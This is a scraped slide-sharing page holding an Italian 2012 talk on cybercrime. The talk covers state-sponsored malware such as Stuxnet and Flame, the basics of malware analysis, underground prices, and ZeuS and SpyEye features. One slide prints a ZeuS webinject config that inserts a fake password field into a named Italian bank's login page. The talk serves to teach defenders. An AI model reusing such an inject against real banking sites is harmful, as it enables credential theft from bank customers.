Ransomware Sodinokibi: Cos'è, Come Funziona E Come Decriptarlo.pdfRansomware Sodinokibi: Cos'è, Come Funziona E Come Decriptarlo.pdf
Ransomware Sodinokibi: Cos'è, Come Funziona E Come Decriptarlo.pdf
 
Internet-of-things, sicurezza, privacy, trust
Internet-of-things, sicurezza, privacy, trustInternet-of-things, sicurezza, privacy, trust
Internet-of-things, sicurezza, privacy, trust
 
Come recuperare file crittografati da diversi dispositivi [2022].pdf
Come recuperare file crittografati da diversi dispositivi [2022].pdfCome recuperare file crittografati da diversi dispositivi [2022].pdf
Come recuperare file crittografati da diversi dispositivi [2022].pdf
 
Linux, sicurezza & social hacking
Linux, sicurezza & social hackingLinux, sicurezza & social hacking
Linux, sicurezza & social hacking
 
Webinar 2020.04.07- Pillole di sicurezza digitale
Webinar 2020.04.07- Pillole di sicurezza digitaleWebinar 2020.04.07- Pillole di sicurezza digitale
Webinar 2020.04.07- Pillole di sicurezza digitale
 
Come recuperare file crittografati da diversi dispositivi [2022].pdf
Come recuperare file crittografati da diversi dispositivi [2022].pdfCome recuperare file crittografati da diversi dispositivi [2022].pdf
Come recuperare file crittografati da diversi dispositivi [2022].pdf
 
SiteLock: Malware, virus e spyware: scopri come proteggere il tuo sito dalle ...
SiteLock: Malware, virus e spyware: scopri come proteggere il tuo sito dalle ...SiteLock: Malware, virus e spyware: scopri come proteggere il tuo sito dalle ...
SiteLock: Malware, virus e spyware: scopri come proteggere il tuo sito dalle ...
 
Come proteggersi dagli attacchi informatici
Come proteggersi dagli attacchi informaticiCome proteggersi dagli attacchi informatici
Come proteggersi dagli attacchi informatici
 
Pentesting Android with BackBox 4
Pentesting Android with BackBox 4Pentesting Android with BackBox 4
Pentesting Android with BackBox 4
 

Crimini Informatici 2012

  • 1. Crimini Informatici 2012 Indagini Digitali in ambito Giudiziario e Forense Terrorismo, spionaggio ed esercito di botnet. La cyberguerra è già in atto. Le sofisticate armi digitali, accuratamente progettate per colpire obiettivi specifici, rappresentano la minaccia più preoccupante che sia stata mai affrontata.
  • 2. Who is? ● Author: Gianni Amato ● Site: www.securityside.it ● Blog: www.gianniamato.it ● Email: amato@securityside.it ● Twitter: @guelfoweb IT Security and Forensics Consultant. Specialized in Cybercrime Intelligence for Internet Industry and Government Agencies.
  • 3. Cosa è il Cybercrime ● Un crimine come tutti gli altri, con l'aggiunta della componente informatica ● La componente informatica può essere il mezzo o l'obiettivo del crimine (o entrambi)
  • 5. L'apocalisse Cosa comporterebbe un ipotetico cyber attacco alle infrastrutture critiche ✔ Prenotazioni online di treni e aerei bloccate ✔ Sistemi di controllo di linee aeree e treni in tilt ✔ Le comunicazioni email interrotte ✔ Caos nelle Pubbliche Amministrazioni ✔ Raffinerie e Oleodotti fuori controllo ✔ Acqua, gas, rete elettrica fuori uso
  • 6. Terrorismo? ● Si, è importante prestare attenzione a tutte le forme di terrorismo. In particolare al terrorismo psicologico.
  • 7. Impossibile che accada? ● No, la Cyberwar è già iniziata. Una guerra digitale tra nazioni notoriamente in contrasto. – 2010: Stuxnet – 2011: Duqu – 2011: Gauss – 2012: Mahdi – 2012: Flame – 2012: Wiper – 2012: Shamoon
  • 8. Chi potrebbero essere gli artefici? ● Chiunque! – Dai servizi segreti ai gruppi di estremisti – Dai militari ai terroristi – Nazioni in contrasto da anni
  • 9. 2010: Stuxnet ● Scoperto nel giugno 2010 ● Obiettivo: Sabotare il programma nucleare Iraniano – Sistemi SCADA ● Windows + WinCC + PCS 7 ● Progetto USA “Operation Olympic Games” iniziato da George W. Bush – Si diffonde via USB – Sfrutta vulnerabilità 0-day
  • 10. 2010: Stuxnet ● La password dei sistemi SCADA (DB WinCC) era conosciuta da oltre 2 anni. Fu pubblicata in un forum e poi rimossa dal moderatore ● Gli autori erano in possesso di certificati digitali: Realtek e JMicron ● Verisign revoca i certificati il 16 luglio ● Il 17 luglio viene rilevata una nuova versione di Stuxnet con i certificati rubati a Jmicron
  • 11. 2010: Stuxnet ● Il valore numerico '1979050' trovato nel registro di sistema delle macchine compromesse da Stuxnet è stato interpretato come la possibile data di nascita di uno degli autori: 09/05/1979 ● E' stato appurato che la data rilevata all'interno del codice di Stuxnet '24/6/12' coincide esattamente con la data del suo decesso
  • 12. 2011: Duqu ● Scoperto nel settembre 2011 ● Condivide codice di Stuxnet (?) ● Il target ancora una volta è l'Iran: valutare lo stato del programma nucleare ● Obiettivo diverso: furto di informazioni ● Utilizza certificati rubati ● Ha funzioni di keylogger ● Sfrutta vulnerabilità 0-day (kernel Windows)
  • 13. 2011: Gauss ● Scoperto nel settembre 2011 ● Rilevato in Libano, Israele, Palestina, Stati Uniti e Emirati Arabi ● Obiettivo: furto di password e conti bancari ● Si ipotizza sia stato creato dagli stessi autori di Stuxnet e Duqu
  • 14. 2012: Mahdi ● Scoperto nel febbraio 2012 ● Il nome deriva da stringhe trovate nel codice che fanno riferimento al Messia Islamico ● Non si conoscono gli autori ● Ha funzioni di keylogger e cattura schermate ● Ruba file audio, file di testo e immagini ● Sfrutta bug di Word e Power Point
  • 15. 2012: Flame ● Scoperto nell'aprile 2012 ● Individuato da Kaspersky Lab in Iran (Iranian Oil Minestry ● CrySyS Lab sostiene che il malware potrebbe essere online dal 2007 ● Si propaga tramite USB Key, nella rete locale grazie ad una vulnerabilità di Windows nei sistemi con stampante condivisa ● Usa un falso certificato digitale
  • 16. 2012: Flame ● Ha funzioni di keylogger ● Cattura immagini ● Registra l'audio (conversazioni via Skype) ● Ruba documenti di testo e file DWG (Progetti AutoCad) ● Rilevate somiglianze con Stuxnet e Duqu ma con un obiettivo diverso: spionaggio industriale
  • 17. 2012: Flame risale al 2008? http://www.crysys.hu/skywiper/skywiper.pdf ● $ python peframe.py --export mssecmgr.ocx ● [IMAGE_EXPORT_DIRECTORY] ● 0x5F694 0x0 Characteristics: 0x0 ● 0x5F698 0x4 TimeDateStamp: 0x493EA336 [Tue Dec 9 16:56:22 2008 UTC] ● 0x5F69C 0x8 MajorVersion: 0x0 ● 0x5F69E 0xA MinorVersion: 0x0 ● 0x5F6A0 0xC Name: 0x13C4EE ● 0x5F6A4 0x10 Base: 0x1 ● 0x5F6A8 0x14 NumberOfFunctions: 0x5 ● 0x5F6AC 0x18 NumberOfNames: 0x5 ● 0x5F6B0 0x1C AddressOfFunctions: 0x13C4BC ● 0x5F6B4 0x20 AddressOfNames: 0x13C4D0 ● 0x5F6B8 0x24 AddressOfNameOrdinals: 0x13C4E4
  • 18. 2012: Wiper ● Un soldato inviato sul campo di battaglia per ripulire le tracce ● Ha lo scopo di cancellare tutte le tracce lasciate da Stuxnet e Duqu ● La priorità di rimuovere le informazioni è data ai file .PNF (usati da Stuxnet) ● Rimuove inoltre tutti dati utili ai tecnici forensi (non è un caso)
  • 19. 2012: Shamoon ● Scoperto nel mese di agosto 2012 ● Shamoon è il nome trovato nel codice ● Progettato per lo spionaggio ● Ha preso di mira un ente petrolifero di Stato Saudita ● Cancella i dati del pc infetto sostituendoli con delle immagini (una bandiera americana) ● I file originali vengono verso un server sconosciuto
  • 20. Perchè analizzare un Malware? L'analisi è una procedura che va eseguita in laboratorio - quando è possibile - e consente di ricostruire la logica del malware per rispondere ai quattro quesiti che si presentano quando una macchina viene compromessa.
  • 21. I 4 Quesiti ● 1. Qual è lo scopo del malware? ● 2. Quali informazioni è riuscito a carpire? ● 3. Dove sono state trasmesse le informazioni? ● 4. Come ha fatto ad arrivare fin qui?
  • 22. Con cosa abbiamo a che fare? ● Persone altamente competenti ● Codice è offuscato ● Crittorgrafia (soprattutto durante la trasmissione dei dati) ● Funzioni di rootkit ● Vulnerabilità 0-day
  • 23. Tipi di Analisi ● Analisi Statica ● Analisi Dinamica – Codice – Comportamento – Signature – Mutazioni – Evidence – Connessioni
  • 25. Malware Anti-Analysis ● Anti Online-Analysis ● Anti Virtualizzation – ThreatExpert – VMware – CWSandbox – Virtualbox – Anubis – Virtual PC ● Anti Debug/Disass. – Softice – OllyDbg – IDA Pro
  • 28. Acquisti nell'Underground Russo ● Hacking a Gmail account: $162 ● Hacking a corporate mailbox: $500) ● Scans of legitimate passports: $5 each ● Winlocker ransomware: $10-20 ● Unintelligent exploit bundle: $25 ● Intelligent exploit bundle: $10-3,000 ● Traffic: $7-15 per 1,000 visitors for the most valuable traffic (from the US and EU)
  • 29. Acquisti nell'Underground Russo ● Basic crypter (for inserting rogue code into a benign file): $10-30 ● SOCKS bot (to get around firewalls): $100 ● Hiring a DDoS attack: $30-70 for a day, $1,200 for a month ● Email spam: $10 per one million e-mails ● Expensive email spam (using a customer database): $50-500 per one million e-mails
  • 30. Acquisti nell'Underground Russo ● SMS spam: $3-150 per 100-100,000 messages ● Bots for a botnet: $200 for 2,000 bots ● DDoS botnet: $700 ● ZeuS source code: $200-$500 ● Windows rootkit (for installing malicious drivers): $292 ● Hacking a Facebook or Twitter account: $130
  • 31. ZeuS Un progetto criminale (ora) Open Source
  • 32. ZeuS Info ● Online dal 2006 ● Scritto in Visual C++ ● Gli autori non amano chiamarlo Trojan, Backdoor o Virus. Lo chiamano semplicemente “Bot” ● Prende di mira i sistemi MS Windows ● Basato sulle intercettazioni delle WinAPI
  • 33. ZeuS Ring ● Ring3 – Garantisce adattabilità e scalabilità – Può operare in Guest User
  • 34. ZeuS Client Features ● Sniffer di traffico su protocollo TCP ● Intercettazione di login FTP ● Intercettazione di login POP3 ● Intercetta le chiamate alla libreria Wininet.dll (usata da Internet Explorer) e nspr4.dll (usata da Firefox) per connessioni HTTP e HTTPS ● Encryption 1024-bit RSA
  • 35. ZeuS Server Features ● Usa Socks 4/4a/5 con supporto UDP e IPv6 ● Connessioni alla macchina infetta via FTP o RDP ● Screenshot in real time ● Esecuzione comandi da remoto
  • 36. ZeuS HTTP-inject/HTTP-grabber webinjects.txt set_url https://privati.internetbanking.bancaintesa.it/sm/login/IN/box_login.jsp GP data_before name="PASSWORD"*<tr> data_end data_inject <td height="32" class="grigio10">password dispositiva <br/> <input name="PASSDIS" type="password" size="12" onkeypress="javascript:entsub('PASSWORD', event);" tabindex="2" style="width: 110px;"/></td> <td><img alt="" src="/static/i/spaziatore.gif" width="10"/></td> data_end data_after data_end
  • 38. ZeuS Installation ✔ Apache ✔ PHP ✔ MySql
  • 41. Arriva la Concorrenza La prima versione di SpyEye con opzione Kill Zeus Nato per accaparrarsi una fetta del mercato di ZeuS
  • 42. SpyEye ● Presente dal 2009 ● Progettato dai Russi ● Ha un costo di 500$ al mercato nero ● Il business maggiore è basato sui plugin
  • 43. SpyEye + ZeuS ● Brute force password guessing ● Jabber notification ● VNC module ● Auto-spreading ● Auto-update ● Screenshot system